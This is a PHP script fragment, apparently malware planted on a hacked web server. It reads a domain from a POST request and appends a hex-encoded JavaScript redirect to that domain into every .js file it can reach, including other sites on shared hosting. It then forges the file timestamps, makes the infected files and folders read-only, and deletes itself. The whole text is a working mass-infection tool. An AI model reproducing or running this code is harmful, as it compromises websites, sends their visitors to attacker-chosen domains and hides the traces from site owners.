'; if (!function_exists('explode')) { function explode($str, $array) { return split($str, $array); } } if (empty($_POST['domain'])){ exit(0); } function hexfromdec($txt) { $hexx = ''; $len = strlen($txt); for ($i = 0; $i < $len; $i++) { $hex = dechex(ord($txt[$i])); if (strlen($hex) === 1) { $hex = '0' . $hex; } $hexx .= '\\x' . $hex; } return $hexx; } function endsWith($FullStr, $needle) { $StrLen = strlen($needle); $FullStrEnd = substr($FullStr, strlen($FullStr) - $StrLen); return $FullStrEnd == $needle; } function folder_of_file($p1){ if(!stristr($p1, '/')){ return realpath('./'); } if(strpos($p1, '//') !== false){ $p1 = str_replace('//','/',$p1); } if(endsWith($p1, '/') == true){ $p1 = substr_replace($p1 ,'', -1); } $p2 = ''; $ar = explode('/', $p1); for($i=1; $i < count($ar) - 1; $i++){ $p2 .= '/'.$ar[$i]; } if($p1[0] == '.' && $p1[1] == '/'){ $p2 = './'.$p2; } if($p1[0] == '.' && $p1[1] == '.'){ $p2 = '../'.$p2; } if(strpos($p2, '//') !== false){ $p2 = str_replace('//','/',$p2); } return trim($p2); } function save($path, $source){ $os = strtolower(substr(PHP_OS, 0, 3)); $folder_P = folder_of_file($path); if (!is_writable($folder_P) && $os != "win"){ chmod($folder_P, 0755); } if (file_exists($path) && is_file($path) && !is_writable($path) && $os != "win"){ chmod($path, 0644); } if(function_exists('file_put_contents')){ $saV = file_put_contents($path, $source); }else{ $saV = fwrite(fopen($path, 'w'), $source); } return $saV; } function read_cleaned($path){ $contents = ''; if(function_exists('file_get_contents')){ $contents = file_get_contents($path); }elseif(function_exists('fopen') && function_exists('stream_get_contents')){ $contents = stream_get_contents(fopen($path, "r")); }elseif(function_exists('implode') && function_exists('file')){ $contents = implode(file($path)); }elseif(function_exists('file')){ $lines = file($path); if(function_exists('implode')){ $contents = implode($lines); }else{ foreach($lines as $line){ $contents .= $line; } } } return $contents; } function getPath($p2){ $homes = array('public_html', 'httpdocs', 'httpsdocs', 'www', 'web', 'docs', 'htdocs', 'html', 'site'); foreach($homes as $home){ if(preg_match("/\/".$home."/", $p2)){ return '/'.$home.'/'; } } return '/'; } function fucked_index($file){ global $new_index; $old_time = strtotime(date("Y-m-d H:i:s", @filemtime($file))); $file_name = str_replace('\\', '/', $file); $file_name = explode('/', $file); $file_name = $file_name[count($file_name)-1]; $old_file = read_cleaned($file); if(preg_match_all("#window\.location\.href = \"(.*)\";#", $old_file, $old_codes)){ foreach($old_codes[0] as $old){ $index = str_replace($old, $new_index, $old_file); } chmod($file, 0644); $save = save($file, $index); if (!$save){ unlink($file); save($file, $index); } touch($file, $old_time, $old_time); $old_file = read_cleaned($file); } $index = trim($old_file)."\n".$new_index; chmod($file, 0644); $save = save($file, $index); chmod($file, 0444); if (!$save){ unlink($file); save($file, $index); chmod($file, 0444); } touch($file, $old_time, $old_time); } function mass_all($path, $couter = 0){ global $js_fdrs; if ($couter > 8){ return FALSE; } $folders = glob($path.'/*', GLOB_ONLYDIR); $files_js = glob($path.'/*.js'); if ($files_js){ foreach ($files_js as $file) { $js_fdrs[] = dirname(realpath($file)); fucked_index($file); } } if ($folders){ $couter++; foreach ($folders as $dir) { $folder_name = str_replace('\\', '/', $dir); $folder_name = explode('/', $dir); $folder_name = $folder_name[count($folder_name)-1]; if(!is_readable($dir) || is_link($dir) || (strlen($folder_name) == 7 && !preg_match('/plugins|akismet|uploads|scripts/i', $folder_name)) || $folder_name == '.' || $folder_name == '..' || preg_match("/sym/", $folder_name) || preg_match("/root/", $folder_name) || preg_match("/config/", $folder_name) || preg_match("/404/", $folder_name) || preg_match("/well-known/", $folder_name)) continue; mass_all($dir, $couter); } } } function js_fd0555(){ global $js_fdrs; if($js_fdrs){ $unique_array = array_unique($js_fdrs); foreach ($unique_array as $dir) { chmod($dir, 0555); } } } $new_index = 'window.location.href = "https://just-test.com";'; $new_index = str_replace('https://just-test.com', hexfromdec('https://'.trim($_POST['domain'])), $new_index); $REQUESTURI = strval($_SERVER['REQUEST_URI']); while(strstr($REQUESTURI, '//')){ $REQUESTURI = str_replace('//', '/', $REQUESTURI); } if(strstr($REQUESTURI, '?')){ $REQUESTURI = explode('?', $REQUESTURI); $REQUESTURI = $REQUESTURI[0]; } $xRoot = substr_count($REQUESTURI, '/'); $root = './'; $counter = 1; while($counter < intval($xRoot)){ $root .= '../'; $counter++; } $pwd = @getcwd(); $domain = $_SERVER['HTTP_HOST']; if(strstr($domain, 'www.')){ $domain = str_replace('www.', '', $domain); } if (preg_match("/www\.".$domain."/", $pwd)) { $domain = 'www.'.$domain; } $js_fdrs = array(); mass_all($root); if(preg_match("/\/public_html/", $pwd)){ mass_all('../'.$root); } if(preg_match("/\/app\/public/", $pwd) && !preg_match("/\/app\/public/", $REQUESTURI)){ $root .= '../../'; mass_all($root); }elseif (preg_match("/\/public\//", $pwd) && !preg_match("/\/public\//", $REQUESTURI)){ $root .= '../'; mass_all($root); } $CK = 0; if (preg_match("/$domain/", $pwd)){ $CK = 1; preg_match("#(.*)$domain#", $pwd, $p1); preg_match("#$domain(.*)#", $pwd, $p2); $p1 = $p1[1]; $p2 = $p2[1]; $p = getPath($p2); if(endsWith($p1, '/') != TRUE){ $gl = rtrim($p1, '/'); $gl = explode('/', $gl); $gl = $gl[count($gl)-1]; $p1 = str_replace($gl, '', $p1); } $scan_dir = scandir($p1); foreach($scan_dir as $dom) { if (preg_match("/\./", $dom) && is_dir($p1.$dom) && $dom != '.' && $dom != '..' && $dom != '...' && $dom != $domain && substr($dom, 0, 1) != '.'){ $root = $p1.$dom.$p; mass_all($root); } } }elseif(substr_count($domain, '.') > 1){ $domain2 = explode('.', $domain); $domain = str_replace($domain2[0].'.', '', $domain); if (preg_match("/$domain/", $pwd)){ $CK = 1; preg_match("#(.*)$domain#", $pwd, $p1); preg_match("#$domain(.*)#", $pwd, $p2); $p1 = $p1[1]; $p2 = $p2[1]; $p = getPath($p2); if(endsWith($p1, '/') != TRUE){ $gl = rtrim($p1, '/'); $gl = explode('/', $gl); $gl = $gl[count($gl)-1]; $p1 = str_replace($gl, '', $p1); } $scan_dir = scandir($p1); foreach($scan_dir as $dom) { if (preg_match("/\./", $dom) && is_dir($p1.$dom) && $dom != '.' && $dom != '..' && $dom != '...' && $dom != $domain && substr($dom, 0, 1) != '.'){ $root = $p1.$dom.$p; mass_all($root); } } } } if(preg_match("/\/public_html/", $pwd) && $CK != 1){ $pathS = []; preg_match("#(.*)\/public_html#", $pwd, $p); $p1 = $p[1].'/'; $p2 = $p[0].'/'; $scan_dir = scandir($p1); foreach($scan_dir as $dom) { if (preg_match("/\./", $dom) && is_dir($p1.$dom) && $dom != '.' && $dom != '..' && $dom != '...' && $dom != $domain && substr($dom, 0, 1) != '.'){ $root = $p1.$dom.'/'; $pathS[$dom] = $root; } } $scan_dir = scandir($p2); foreach($scan_dir as $dom) { if (preg_match("/\./", $dom) && is_dir($p2.$dom) && $dom != '.' && $dom != '..' && $dom != '...' && $dom != $domain && substr($dom, 0, 1) != '.'){ $root = $p2.$dom.'/'; $pathS[$dom] = $root; } } if($pathS){ foreach($pathS as $dom => $root) { mass_all($root); } } } js_fd0555(); echo 'Done'; unlink( __FILE__ ); ?>